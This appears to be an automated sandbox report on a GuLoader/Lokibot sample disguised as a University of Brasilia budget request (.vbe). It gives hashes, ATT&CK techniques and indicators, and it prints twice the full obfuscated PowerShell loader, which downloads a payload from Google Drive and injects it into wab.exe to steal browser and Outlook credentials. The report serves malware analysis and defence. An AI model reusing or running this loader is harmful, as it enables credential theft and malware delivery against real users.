guloader | e2fda069aeb3745872935ff4b9ed64ce7f40cae6b6b57a7f4bfb37a01d9178b1

General

Target

BUDGET REQUEST (University of Brasilia) 05-09-2024.vbe
Size

25KB
MD5

3ccecc201a02a447e202b789225d485a
SHA1

3f862aa3bd5a63377d92bda94fde52fb6117787f
SHA256

5818ebc075a84b23c0e75e871bd910fa656d9f5e39f96a9e23ff15d10b4b1fad
SHA512

5ca42afdc12633066081134fcaea9a5fec2f4095997a62b1a80e1b7bcefa0eec1a6bc57f1f1d26907ddb3ebf5831a92fe0b64d7a4fb8620caaf7b36dbd8e29e0
SSDEEP

384:Vwm8rpPNSoc8/zHXzM18KL20GrPWRIdbiKiz:58C6D2Er2ozY

Score

10^/10

guloader lokibot collection credential_access discovery downloader execution spyware stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2684	powershell.exe
7	2684	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wab.exe
Key opened	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	wab.exe
Key opened	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wab.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2684	powershell.exe
2628	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
5	drive.google.com
9	drive.google.com
4	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
2348	wab.exe
2348	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2628	powershell.exe
2348	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2628 set thread context of 2348	2628	powershell.exe	36

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2684	powershell.exe
2628	powershell.exe
2628	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2628	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	2628	powershell.exe
Token: SeDebugPrivilege	2348	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1284 wrote to memory of 2684	1284	WScript.exe	30
PID 1284 wrote to memory of 2684	1284	WScript.exe	30
PID 1284 wrote to memory of 2684	1284	WScript.exe	30
PID 2684 wrote to memory of 2688	2684	powershell.exe	32
PID 2684 wrote to memory of 2688	2684	powershell.exe	32
PID 2684 wrote to memory of 2688	2684	powershell.exe	32
PID 2684 wrote to memory of 2628	2684	powershell.exe	34
PID 2684 wrote to memory of 2628	2684	powershell.exe	34
PID 2684 wrote to memory of 2628	2684	powershell.exe	34
PID 2684 wrote to memory of 2628	2684	powershell.exe	34
PID 2628 wrote to memory of 2984	2628	powershell.exe	35
PID 2628 wrote to memory of 2984	2628	powershell.exe	35
PID 2628 wrote to memory of 2984	2628	powershell.exe	35
PID 2628 wrote to memory of 2984	2628	powershell.exe	35
PID 2628 wrote to memory of 2348	2628	powershell.exe	36
PID 2628 wrote to memory of 2348	2628	powershell.exe	36
PID 2628 wrote to memory of 2348	2628	powershell.exe	36
PID 2628 wrote to memory of 2348	2628	powershell.exe	36
PID 2628 wrote to memory of 2348	2628	powershell.exe	36
PID 2628 wrote to memory of 2348	2628	powershell.exe	36

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wab.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BUDGET REQUEST (University of Brasilia) 05-09-2024.vbe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1284
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Runspace) {$Kolsunsraelerne++;$Lovmssige='Immoderate';$Killig='su';$Lovmssige+='Havocs';$Killig+='bs';$Lovmssige+='Grady';$Killig+='tr';$Lovmssige+='Unworshiped';}$Killig+='ing';Function Motorpace($Resundssejladser){$Exostome=$Resundssejladser.Length-$Kolsunsraelerne;For( $Kolsun=5;$Kolsun -lt $Exostome;$Kolsun+=6){$Navneliste+=$Resundssejladser.$Killig.'Invoke'( $Kolsun, $Kolsunsraelerne);}$Navneliste;}function Svmmedykker($Obligative){ & ($Polytope) ($Obligative);}$Styrkendes46=Motorpace '.utelMshea.oSkridzAltsaiAevitlScalelSammeaTorvo/Socio5til r.Narko0K rav Envio( UnbrWElectiRewirn.olumdTaleloB.belwLangesSa,bh TolkN G itTForsr rik1 ,all0Porre.Malei0Consu;.orla RegraW Aad i G rgnporen6S,yrt4Medta;Udklk VoluxTra,s6 Ecph4Gents;Viden VejarrVirt.varter:Not.t1Un os2Chefa1di,th.Irrev0Anaye) Kabe TrampG .htheG nskc ColekClipeo Enl,/Vakuu2Meane0S.ati1Supra0Matgr0 tjen1Strat0 N.mb1Sprog fo trFOctasiAutorrUde veHu,rofR adioUnr,cxMater/Salls1Ane o2 Be.z1 Bdni.Car l0djae. ';$Afkastningsgraden=Motorpace ' DyreUVolcasSpiegeWhereru,fen-FejlpACordegPhysaeSpa ynUdmejtKlude ';$Overskudsproduktions=Motorpace 'Male h ladatLyds t FlyvpDiv.rs Bifo:Organ/Plat / T ltd AritrBebygiA.besvPolype Side. TeglgHun,ro Bucko,ulvegRe irlGargee Anti. Ov,rc S leoProlomBispe/ scheuCinclcEvent?UpshoeJod,ix escap Sk,noPatiercatabtProev=Card dAnagoos.baxwProemnFuldflinteroParamaRekomdalbin&rudleibi,pod Atte=Anisa1 Unre6ImmanuDilet3Jewel7Semibzh.loa4Maks,r Thaub Be,iQRen.ay Taut0StaveHSatelPCo.ar9Al,odwDraftK Gr.mr KrluhChondpDet.iHbl.ff-Que,siZaneletrekki E thI nummm Impo1sp rgXRayleWOrkan_Hyd,oTUnex 2Trykp ';$Lactamide=Motorpace 'Inddm>Tro.l ';$Polytope=Motorpace 'ProphiBa dieRegnixUnspl ';$ron='Chronics';$Wineglassful = Motorpace 'AfslreMarkecPotchhPandeoCa th netv.% onfaL,stnpOrganpInsemd pureaApprotIsogoaUnde %Hemat\DefloCSpe krPu.keuFormalGyptol co.teRhyn rGrund.CommiMHampeiStaalkM.gma Tings&Mi be&Hamun T.theeCalumcS.genh,ruknoUnder kyssetPisti ';Svmmedykker (Motorpace 'Rgsky$SymmegAfmillCoat oBrdknbHarkaaIn.amlAngli: FanwKCon,ee GarlrScleriBegobtOrg,neUnapp= ove,(U.wancPacifm CuridOr.eg Catab/P niscRelet Funki$GravyW,onchiG,bbenpentae PedigJuramlBeskfa,ermisKup,esObligfBrd,nuWomp lB,sta)Amt,r ');Svmmedykker (Motorpace ' Mar,$VirgugPsychlFj,rnoAfdelb Cel,aCoparlIm le:Erog G as iu .ypelValfasTaktloSpa etroe,eeSkraanRing,sKvart=Drugs$.iponOso,kpvBrug.eKoop.r kiftsPiskek .orkuEgensdAdm.rsP,stipVerderFej.hoHepatd SymmueventkDykketUn omi,nwhioUtaknn BusesVenen.Ba,dss ResypLipinlAbitui onc,tDynge(,odav$Ki keLTa,taaskja cSoci.tVernaaTessemBrneci KontdFremaeSuper)No,pa ');Svmmedykker (Motorpace 'Ove,l[DiaziNProv.eWagprtLeg m.R,tsjS,rifteGenbrrAzotevPoly iPh.rmc.ikkeeGlucaPapishoTablii SubcnC.rchtAssurMOptima OmsknBolleaSepargCarboe,lodsr Antl]Tyran: Sa.o: CormSUnbareSlavecOdinsuCeramr MicriMol,itDugaly EnaaPSlumrrDiesioGasmat JomfoEpi,ycN,nexoRecallRems Simpl=Aridi Scrub[Om,anN AnteeSkotjtKoe s.L denSman,aeFlam cFron,u I,strTimesiFrladt KyshyFuderPAtropr Bes.o DriktNontooTindecVirkeoEncoml SkolTTailty .vesplejl.e Esse] Data:Gisla:FabriTAffallSol.asBeg,n1 samm2Begrl ');$Overskudsproduktions=$Gulsotens[0];$logoet= (Motorpace 'Merom$CommugHarb.lGuerio eliub.ntera Wh plUdda,:adminI ranmNectapfo.ete nterr basiaNoveltDel,eiDiesev andsaUn.hol Tegn=SurreN scute Da,bw Irv -B olaOEpigrb Tll jFl,adeKoge.cFr,srt Spee Viri SUn ocy.estasGlucotColleeSambumSstvl.Gide.N,alisePur ltD.ese.budgeW Gay eMktubb,icklC FremlAgrobiContrei,mignFryset');$logoet+=$Kerite[1];Svmmedykker ($logoet);Svmmedykker (Motorpace 'bl.dh$G nufIOccidmTrachpDekode TolirUnderaFlui.tHalvfiU dervkla.ma DefilVwasy.Co bsH TriweVerdeauls ldGideoeeurylrvid,esCohob[ Sand$AdaptAMentafUnwi.kTi flaStandsPrefitUnde,n GebniKdedanAnem gmani s TyvagHallurMisasaTaskedTilile Indtn U de] Tyro=Acant$ForsyS.eepit Afd.ytypolr skarkPerfeeInd anLucerdInteneFrysesCla.p4 Bazo6.kspe ');$Ternet=Motorpace 'F.tek$ Af.rIAdrammDrepap SpeceAmbivrracedaApplitTresiiDiskevJanicaPa,nelSquet.TerseDTelevo Analw EjennDeforllin.eoMarloa ekvdco.ceFUdst iInjeclAutodeOvert(Haand$KolleODopsiv Lagee Rawlr.inolsAggrekSyss,uSelskd isplsAlle pGammerGe,neoFavnedJordluLreprkTrematr.sigiSubcroPredenUnrevsGenin, Leve$HulebU.rokbnBajadaPara.l.ecitl SanceHjmosvTab ei RantaTempetBereteV.ndidAks,e) sl.a ';$Unalleviated=$Kerite[0];Svmmedykker (Motorpace 'Mandi$Krte,gSamb l SubeoOpsp bAbbotaTeks.lTempe: GudsSParisaTeenakColocrSympoaRhombmFleere,robrnP,lydtExhaleNaturrSk ten fsmetriam=F.tni( ca oT Theoe Neohs Start Worr-Band,PT,lanaHydrotAd udhGim e W,rld$.illeUCykelnNeddmaUltral NonmlConseeG.ndbvOverdiRavenaSynopt Ke,ne,alavdTavle)reexc ');while (!$Sakramenterne) {Svmmedykker (Motorpace 'massr$Se chg.ardilMomseog.nskbHonnraGisehl skrm: Hy,eOHylder Gen,lD,preoStofsv.ermaedistrnSti,l=Non p$ ParktTer.irD voruGedebe ,ton ') ;Svmmedykker $Ternet;Svmmedykker (Motorpace ' noncSSortitKonkuak.agurP eidtKaals-Mult,SEla.hlUd oreMegape GonopBrewi Skrve4Skump ');Svmmedykker (Motorpace 'Reimp$Sunkng BdstlCommeoFlashbI digaSa.frlM.ria: ChonSStjeraSophik F.rhrVes ia ,ndemkeftieBrugenOstertBrylle BullrSvaghnTryk,evaria=Pla m(MurarTMrkese T lfsFerietforb - SeedPBystya thanteft.rhAffre Pools$ToaggUGid en FalkaClepelkonkulFar ee Pap,vt,erai Dagha Gargt AlloeRgvardPondt)Nonre ') ;Svmmedykker (Motorpace ' ubd$Ne,otg,orbelAc,eso Shirbtin,eaDisenlMunte:UnderC,atofeTriviy ,dtul,parlokvartnFjernsN,ncl= othe$RowelgBellylRock oSanktb krudaPolyclRen,e:EngleSTraumk K ntrRoseluKbe,obSegrenMortiiGiggenSy eegTe,mseSk aanBewor+Semip+ Dise% itt$TomahGEkspeu Regil V.sts BramoMolekt.krube A,tenHan,esSpira.GoodicmelodoTetrauVejkanMug.tt Scre ') ;$Overskudsproduktions=$Gulsotens[$Ceylons];}$Unbendably=336468;$Bullterrier=28207;Svmmedykker (Motorpace 'Scoff$ VarigStranlK uteoTcphobSolliaJuniol,dbyd: cameHBombev kiasi Crocd Pa.ltUndereEhrlikKininaBarbrl Unctkt.mpeeLivsfn elissKlukf Averr= Wils Tred.GVo.eeeHol,ytAimau-BundfC ProgoOrd.in tentFladteD prenAb ictSkald ,ivet$Zit aUStjern GrataStipul SkaklMiscieMigrav SithiKva,ta Sal,tCoelie.peradad,en ');Svmmedykker (Motorpace 'Under$Syns,gScumllLogheoTu,bib Het.aD,faulKolla:TransGEksiluGushen ,ypohRanchoMobniuVert.sUnc,oe Neph Circu= Echi T,len[.ireaSKarboyf revsAdyn,tMouileVowelmtropo.LanatC IndioLyssinSpidsvWickieAma grbenvntBowle] bnin:Be.oe:HerbaFFedesrDevisoUnd,rmP.rsoBUdenra DrifsDem peLag,r6Ignes4Mi erSDa.eft VertrSkrueiInt rn P evgmikro(Union$ DiveHCoweevKvadriFledgdvagtttdistieB,rnskAnt.faFod tlIndskk KeraeKalkmnbevges,nfan)Yoghp ');Svmmedykker (Motorpace 'Snoha$.plengNaboilProprodemobbSubina SmaglRec,n:F.oksPM.unto heartRelabhHydr.oLoftrl Wo,kd arbeeMode r sem sBolig Lime= Mi k Morth[ ZoosSBarquyk,mprs H nktRi oseHalerm Post.UddatTAlk,ne.atinx Landt Pol .OccidEFaunanSekt,cUns,aoTangndHor eiSvo lnTrochgBlink] pron:Af.ed:KontaABrairSAwhirCPreorIHistoILonqu.AtrieGLee aeWhutet MiniSHaimatBegarrAstmaiAttrin InfagKonse( Lati$Ho,tiGnonfauI scrn.iscphLtappo arg uFu dasDilateRivej)snurr ');Svmmedykker (Motorpace ',ehov$MisevgJagtglGetaho Sofab InteaHerculSaddl:empirTFormielmmelsPeberaRestrrUngmeoPersovnyoriiDolbyt SolscPrapshIn.an=Konso$AktriP HakooOrrhotBkkenhIambioProtolfo,uldNearaeRe.irr K.mms.rgue.ChilosSve juRump bCrostsTumbrtBenefr Cr.ni Jrgin TestgRaffi(Komme$ PlasUAmp.in Pachb nanieUforsnArbejd.ubfoaRenhobBanjolForstyLngde,Jomfr$PersoBMigh uIncoolParadlN.dpltFloodePhilirParalrMormoiSuitleB mberUnico)Attra ');Svmmedykker $Tesarovitch;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2684
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cruller.Mik && echo t"
    3⤵
    PID:2688
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Runspace) {$Kolsunsraelerne++;$Lovmssige='Immoderate';$Killig='su';$Lovmssige+='Havocs';$Killig+='bs';$Lovmssige+='Grady';$Killig+='tr';$Lovmssige+='Unworshiped';}$Killig+='ing';Function Motorpace($Resundssejladser){$Exostome=$Resundssejladser.Length-$Kolsunsraelerne;For( $Kolsun=5;$Kolsun -lt $Exostome;$Kolsun+=6){$Navneliste+=$Resundssejladser.$Killig.'Invoke'( $Kolsun, $Kolsunsraelerne);}$Navneliste;}function Svmmedykker($Obligative){ & ($Polytope) ($Obligative);}$Styrkendes46=Motorpace '.utelMshea.oSkridzAltsaiAevitlScalelSammeaTorvo/Socio5til r.Narko0K rav Envio( UnbrWElectiRewirn.olumdTaleloB.belwLangesSa,bh TolkN G itTForsr rik1 ,all0Porre.Malei0Consu;.orla RegraW Aad i G rgnporen6S,yrt4Medta;Udklk VoluxTra,s6 Ecph4Gents;Viden VejarrVirt.varter:Not.t1Un os2Chefa1di,th.Irrev0Anaye) Kabe TrampG .htheG nskc ColekClipeo Enl,/Vakuu2Meane0S.ati1Supra0Matgr0 tjen1Strat0 N.mb1Sprog fo trFOctasiAutorrUde veHu,rofR adioUnr,cxMater/Salls1Ane o2 Be.z1 Bdni.Car l0djae. ';$Afkastningsgraden=Motorpace ' DyreUVolcasSpiegeWhereru,fen-FejlpACordegPhysaeSpa ynUdmejtKlude ';$Overskudsproduktions=Motorpace 'Male h ladatLyds t FlyvpDiv.rs Bifo:Organ/Plat / T ltd AritrBebygiA.besvPolype Side. TeglgHun,ro Bucko,ulvegRe irlGargee Anti. Ov,rc S leoProlomBispe/ scheuCinclcEvent?UpshoeJod,ix escap Sk,noPatiercatabtProev=Card dAnagoos.baxwProemnFuldflinteroParamaRekomdalbin&rudleibi,pod Atte=Anisa1 Unre6ImmanuDilet3Jewel7Semibzh.loa4Maks,r Thaub Be,iQRen.ay Taut0StaveHSatelPCo.ar9Al,odwDraftK Gr.mr KrluhChondpDet.iHbl.ff-Que,siZaneletrekki E thI nummm Impo1sp rgXRayleWOrkan_Hyd,oTUnex 2Trykp ';$Lactamide=Motorpace 'Inddm>Tro.l ';$Polytope=Motorpace 'ProphiBa dieRegnixUnspl ';$ron='Chronics';$Wineglassful = Motorpace 'AfslreMarkecPotchhPandeoCa th netv.% onfaL,stnpOrganpInsemd pureaApprotIsogoaUnde %Hemat\DefloCSpe krPu.keuFormalGyptol co.teRhyn rGrund.CommiMHampeiStaalkM.gma Tings&Mi be&Hamun T.theeCalumcS.genh,ruknoUnder kyssetPisti ';Svmmedykker (Motorpace 'Rgsky$SymmegAfmillCoat oBrdknbHarkaaIn.amlAngli: FanwKCon,ee GarlrScleriBegobtOrg,neUnapp= ove,(U.wancPacifm CuridOr.eg Catab/P niscRelet Funki$GravyW,onchiG,bbenpentae PedigJuramlBeskfa,ermisKup,esObligfBrd,nuWomp lB,sta)Amt,r ');Svmmedykker (Motorpace ' Mar,$VirgugPsychlFj,rnoAfdelb Cel,aCoparlIm le:Erog G as iu .ypelValfasTaktloSpa etroe,eeSkraanRing,sKvart=Drugs$.iponOso,kpvBrug.eKoop.r kiftsPiskek .orkuEgensdAdm.rsP,stipVerderFej.hoHepatd SymmueventkDykketUn omi,nwhioUtaknn BusesVenen.Ba,dss ResypLipinlAbitui onc,tDynge(,odav$Ki keLTa,taaskja cSoci.tVernaaTessemBrneci KontdFremaeSuper)No,pa ');Svmmedykker (Motorpace 'Ove,l[DiaziNProv.eWagprtLeg m.R,tsjS,rifteGenbrrAzotevPoly iPh.rmc.ikkeeGlucaPapishoTablii SubcnC.rchtAssurMOptima OmsknBolleaSepargCarboe,lodsr Antl]Tyran: Sa.o: CormSUnbareSlavecOdinsuCeramr MicriMol,itDugaly EnaaPSlumrrDiesioGasmat JomfoEpi,ycN,nexoRecallRems Simpl=Aridi Scrub[Om,anN AnteeSkotjtKoe s.L denSman,aeFlam cFron,u I,strTimesiFrladt KyshyFuderPAtropr Bes.o DriktNontooTindecVirkeoEncoml SkolTTailty .vesplejl.e Esse] Data:Gisla:FabriTAffallSol.asBeg,n1 samm2Begrl ');$Overskudsproduktions=$Gulsotens[0];$logoet= (Motorpace 'Merom$CommugHarb.lGuerio eliub.ntera Wh plUdda,:adminI ranmNectapfo.ete nterr basiaNoveltDel,eiDiesev andsaUn.hol Tegn=SurreN scute Da,bw Irv -B olaOEpigrb Tll jFl,adeKoge.cFr,srt Spee Viri SUn ocy.estasGlucotColleeSambumSstvl.Gide.N,alisePur ltD.ese.budgeW Gay eMktubb,icklC FremlAgrobiContrei,mignFryset');$logoet+=$Kerite[1];Svmmedykker ($logoet);Svmmedykker (Motorpace 'bl.dh$G nufIOccidmTrachpDekode TolirUnderaFlui.tHalvfiU dervkla.ma DefilVwasy.Co bsH TriweVerdeauls ldGideoeeurylrvid,esCohob[ Sand$AdaptAMentafUnwi.kTi flaStandsPrefitUnde,n GebniKdedanAnem gmani s TyvagHallurMisasaTaskedTilile Indtn U de] Tyro=Acant$ForsyS.eepit Afd.ytypolr skarkPerfeeInd anLucerdInteneFrysesCla.p4 Bazo6.kspe ');$Ternet=Motorpace 'F.tek$ Af.rIAdrammDrepap SpeceAmbivrracedaApplitTresiiDiskevJanicaPa,nelSquet.TerseDTelevo Analw EjennDeforllin.eoMarloa ekvdco.ceFUdst iInjeclAutodeOvert(Haand$KolleODopsiv Lagee Rawlr.inolsAggrekSyss,uSelskd isplsAlle pGammerGe,neoFavnedJordluLreprkTrematr.sigiSubcroPredenUnrevsGenin, Leve$HulebU.rokbnBajadaPara.l.ecitl SanceHjmosvTab ei RantaTempetBereteV.ndidAks,e) sl.a ';$Unalleviated=$Kerite[0];Svmmedykker (Motorpace 'Mandi$Krte,gSamb l SubeoOpsp bAbbotaTeks.lTempe: GudsSParisaTeenakColocrSympoaRhombmFleere,robrnP,lydtExhaleNaturrSk ten fsmetriam=F.tni( ca oT Theoe Neohs Start Worr-Band,PT,lanaHydrotAd udhGim e W,rld$.illeUCykelnNeddmaUltral NonmlConseeG.ndbvOverdiRavenaSynopt Ke,ne,alavdTavle)reexc ');while (!$Sakramenterne) {Svmmedykker (Motorpace 'massr$Se chg.ardilMomseog.nskbHonnraGisehl skrm: Hy,eOHylder Gen,lD,preoStofsv.ermaedistrnSti,l=Non p$ ParktTer.irD voruGedebe ,ton ') ;Svmmedykker $Ternet;Svmmedykker (Motorpace ' noncSSortitKonkuak.agurP eidtKaals-Mult,SEla.hlUd oreMegape GonopBrewi Skrve4Skump ');Svmmedykker (Motorpace 'Reimp$Sunkng BdstlCommeoFlashbI digaSa.frlM.ria: ChonSStjeraSophik F.rhrVes ia ,ndemkeftieBrugenOstertBrylle BullrSvaghnTryk,evaria=Pla m(MurarTMrkese T lfsFerietforb - SeedPBystya thanteft.rhAffre Pools$ToaggUGid en FalkaClepelkonkulFar ee Pap,vt,erai Dagha Gargt AlloeRgvardPondt)Nonre ') ;Svmmedykker (Motorpace ' ubd$Ne,otg,orbelAc,eso Shirbtin,eaDisenlMunte:UnderC,atofeTriviy ,dtul,parlokvartnFjernsN,ncl= othe$RowelgBellylRock oSanktb krudaPolyclRen,e:EngleSTraumk K ntrRoseluKbe,obSegrenMortiiGiggenSy eegTe,mseSk aanBewor+Semip+ Dise% itt$TomahGEkspeu Regil V.sts BramoMolekt.krube A,tenHan,esSpira.GoodicmelodoTetrauVejkanMug.tt Scre ') ;$Overskudsproduktions=$Gulsotens[$Ceylons];}$Unbendably=336468;$Bullterrier=28207;Svmmedykker (Motorpace 'Scoff$ VarigStranlK uteoTcphobSolliaJuniol,dbyd: cameHBombev kiasi Crocd Pa.ltUndereEhrlikKininaBarbrl Unctkt.mpeeLivsfn elissKlukf Averr= Wils Tred.GVo.eeeHol,ytAimau-BundfC ProgoOrd.in tentFladteD prenAb ictSkald ,ivet$Zit aUStjern GrataStipul SkaklMiscieMigrav SithiKva,ta Sal,tCoelie.peradad,en ');Svmmedykker (Motorpace 'Under$Syns,gScumllLogheoTu,bib Het.aD,faulKolla:TransGEksiluGushen ,ypohRanchoMobniuVert.sUnc,oe Neph Circu= Echi T,len[.ireaSKarboyf revsAdyn,tMouileVowelmtropo.LanatC IndioLyssinSpidsvWickieAma grbenvntBowle] bnin:Be.oe:HerbaFFedesrDevisoUnd,rmP.rsoBUdenra DrifsDem peLag,r6Ignes4Mi erSDa.eft VertrSkrueiInt rn P evgmikro(Union$ DiveHCoweevKvadriFledgdvagtttdistieB,rnskAnt.faFod tlIndskk KeraeKalkmnbevges,nfan)Yoghp ');Svmmedykker (Motorpace 'Snoha$.plengNaboilProprodemobbSubina SmaglRec,n:F.oksPM.unto heartRelabhHydr.oLoftrl Wo,kd arbeeMode r sem sBolig Lime= Mi k Morth[ ZoosSBarquyk,mprs H nktRi oseHalerm Post.UddatTAlk,ne.atinx Landt Pol .OccidEFaunanSekt,cUns,aoTangndHor eiSvo lnTrochgBlink] pron:Af.ed:KontaABrairSAwhirCPreorIHistoILonqu.AtrieGLee aeWhutet MiniSHaimatBegarrAstmaiAttrin InfagKonse( Lati$Ho,tiGnonfauI scrn.iscphLtappo arg uFu dasDilateRivej)snurr ');Svmmedykker (Motorpace ',ehov$MisevgJagtglGetaho Sofab InteaHerculSaddl:empirTFormielmmelsPeberaRestrrUngmeoPersovnyoriiDolbyt SolscPrapshIn.an=Konso$AktriP HakooOrrhotBkkenhIambioProtolfo,uldNearaeRe.irr K.mms.rgue.ChilosSve juRump bCrostsTumbrtBenefr Cr.ni Jrgin TestgRaffi(Komme$ PlasUAmp.in Pachb nanieUforsnArbejd.ubfoaRenhobBanjolForstyLngde,Jomfr$PersoBMigh uIncoolParadlN.dpltFloodePhilirParalrMormoiSuitleB mberUnico)Attra ');Svmmedykker $Tesarovitch;"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2628
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cruller.Mik && echo t"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2984
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Accesses Microsoft Outlook profiles
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:2348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Cruller.Mik

Filesize
474KB

MD5
7a4d866c9a355a3e65375c8b5856be93

SHA1
44c0ce7c7677d9128ed1a1b505ae162c731bf835

SHA256
ff0f7ed7556903ab34580bbe56f754e0854b8cef7b92419f578a8a9e467de78e

SHA512
7533cb3a2f373271ddf9bbcab504acfccb7deb03d3f778ec4e63e3412b39d5c9dc7b51fe98abd08c307a97630b89915d30d36a197880c64054a72d339828ace5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-457978338-2990298471-2379561640-1000\0f5007522459c86e95ffcc62f32308f1_7ab03691-fc7c-4787-903d-423aed4b9dc2

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-457978338-2990298471-2379561640-1000\0f5007522459c86e95ffcc62f32308f1_7ab03691-fc7c-4787-903d-423aed4b9dc2

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H2262UI4PPJCO0BE3UC0.temp

Filesize
7KB

MD5
d63596b73a3fe5f7b6db1b1de2ac2d42

SHA1
fe47779485867621940eb51cf01b48df6eaee857

SHA256
fe9c9598b7938cda8b4ee5ce261d0c8eee1f180759e199fdd6df6b82d0598cd5

SHA512
8bab2e4a0a1f1e6fb136abbf413f4af7941e78cb8aa157ab222fc3ec399921d395e6fcf9da851b909f0c5be53fe32551aaac715ef8396a39596662cdcecb3693

Download Submit
memory/2348-45-0x0000000000A90000-0x0000000003F17000-memory.dmp

Filesize
52.5MB

Download
memory/2348-41-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2628-20-0x0000000006320000-0x00000000097A7000-memory.dmp

Filesize
52.5MB

Download
memory/2684-8-0x000007FEF4E10000-0x000007FEF57AD000-memory.dmp

Filesize
9.6MB

Download
